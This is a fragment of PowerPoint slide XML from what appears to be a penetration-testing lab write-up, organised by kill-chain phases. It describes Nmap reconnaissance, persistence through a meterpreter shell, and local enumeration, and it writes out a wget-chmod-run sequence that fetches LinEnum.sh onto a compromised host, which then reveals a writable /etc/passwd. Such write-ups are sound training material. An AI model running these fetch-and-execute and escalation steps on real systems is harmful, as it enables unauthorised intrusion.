            <a:endParaRPr lang="en-US" sz="5100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864037" y="3243143"/>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The initial phase involved using Netdiscover to find the target IP address (192.168.1.15).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864037" y="4310896"/>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Nmap was utilized to discover open ports and services, revealing SSH on port 22 and HTTP on port 80.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864037" y="5378648"/>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This phase of the project focuses on amassing as much information as possible about the target system.</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987623"/>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9998FF"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Command and Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Image 0" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="864037" y="2293501"/>
            <a:ext cx="4053840" cy="2505432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864037" y="5107543"/>
            <a:ext cx="3248501" cy="406003"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3150"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2550" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Persistent Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864037" y="5661660"/>
            <a:ext cx="4053840" cy="1580198"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Access was maintained through the meterpreter shell, allowing for ongoing interaction with the compromised system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 1" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5288161" y="2293501"/>
            <a:ext cx="4053959" cy="2505432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5288161" y="5107543"/>
            <a:ext cx="3248501" cy="406003"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3150"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2550" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Local Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5288161" y="5661660"/>
            <a:ext cx="4053959" cy="1580198"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>LinEnum.sh, a script designed to enumerate local system information, was executed to gather additional insights.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Image 2" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9712404" y="2293501"/>
            <a:ext cx="4053840" cy="2505432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9712404" y="5107543"/>
            <a:ext cx="3248501" cy="406003"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3150"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2550" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>System Information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9712404" y="5661660"/>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EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>LinEnum.sh revealed that the /etc/passwd file was readable and writable by the "wside" user.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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E3B2DA17-E860-3505-0F49-209D21D07D46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="804010" y="964024"/>
            <a:ext cx="477083" cy="477083"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC2EBA20-201D-DC8F-F57C-0F0A371AC566}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804010" y="1631845"/>
            <a:ext cx="2510909" cy="313849"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2450"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1950" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Persistent Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1950" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59EE7969-186D-AD8A-3688-0A8FF3C20225}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804010" y="1945694"/>
            <a:ext cx="7315200" cy="998800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Access was maintained through the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> shell, allowing for ongoing interaction with the compromised system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A screenshot of a computer program&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D01A846-21B1-A89A-1733-72D767A70777}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="804010" y="3523207"/>
            <a:ext cx="8923650" cy="4326594"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{783B2B13-4117-A7CB-DFD7-FD6ED9CA804F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8164462" y="1441107"/>
            <a:ext cx="5999009" cy="1656607"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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Wgethttps://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh </a:t>
            </a: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chmod</a:t>
            </a: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777 LinEnum.sh</a:t>
            </a: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./LinEnum.sh</a:t>
            </a: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791173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7CAE7B-0339-76F5-83BB-2109046C17EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762582" y="2912283"/>
            <a:ext cx="10502048" cy="1169166"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2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After the successful run of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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LinEnum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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Script, we find some important information that the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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/passwd file is readable and writable by the user “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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wside</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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2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350CD23-C04C-4481-1C02-09A6750FB890}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2018036" y="4114800"/>
            <a:ext cx="9372466" cy="2467766"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 3" descr="preencoded.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D0F4E00-58A7-49CE-88B9-D5C1664A25FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="762582" y="905319"/>
            <a:ext cx="477083" cy="477083"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B951F5B5-1564-9D38-D125-3459E39F6AD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762582" y="1573141"/>
            <a:ext cx="2510909" cy="313849"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2450"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1950" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>System Information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1950" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A3A1754-B2DC-3BDD-773B-FD887585079E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762582" y="2001409"/>
            <a:ext cx="7808357" cy="610553"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>LinEnum.sh revealed that the /etc/passwd file was readable and writable by the "wside" user.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2835313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1639" y="574834"/>
            <a:ext cx="5501045" cy="687586"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="5400"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9998FF"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Actions on Objectives</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Image 0" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="731639" y="1680448"/>
            <a:ext cx="6426756" cy="3971925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731639" y="5913596"/>
            <a:ext cx="2750463" cy="343733"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2150" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Objective</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731639" y="6382702"/>
            <a:ext cx="6426756" cy="334447"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 1" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7471886" y="1680448"/>
            <a:ext cx="6426875" cy="3972044"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7471886" y="5913715"/>
            <a:ext cx="2750463" cy="343733"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2150" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
